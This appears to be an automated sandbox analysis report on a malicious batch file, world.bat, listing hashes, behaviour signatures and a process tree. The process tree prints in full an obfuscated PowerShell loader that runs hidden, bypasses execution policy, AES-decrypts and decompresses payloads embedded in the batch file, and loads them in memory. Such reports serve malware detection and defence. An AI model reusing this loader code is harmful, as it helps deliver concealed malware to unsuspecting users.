Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
03/03/2025, 10:44
Static task
static1
Behavioral task
behavioral1
Sample
world.bat
Resource
win7-20250207-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
world.bat
Resource
win10v2004-20250217-en
14 signatures
150 seconds
General
-
Target
world.bat
-
Size
94KB
-
MD5
a5bd53f790ed63251d0f435b17ada13d
-
SHA1
c0ada960a41596819df77f185dfe79b730ade6c8
-
SHA256
348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e
-
SHA512
fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0
-
SSDEEP
1536:y3UhPdcYkDCDYe694UQ3DvwDnqFDdbYdLRmUpDLHcfVWeIZ9U1mRDLOeBrT:y3K6Yb694VzvweEUUefVmZOwRDLOW
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2504 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2504 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2768 wrote to memory of 2504 2768 cmd.exe 31 PID 2768 wrote to memory of 2504 2768 cmd.exe 31 PID 2768 wrote to memory of 2504 2768 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\world.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Local\Temp\world.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-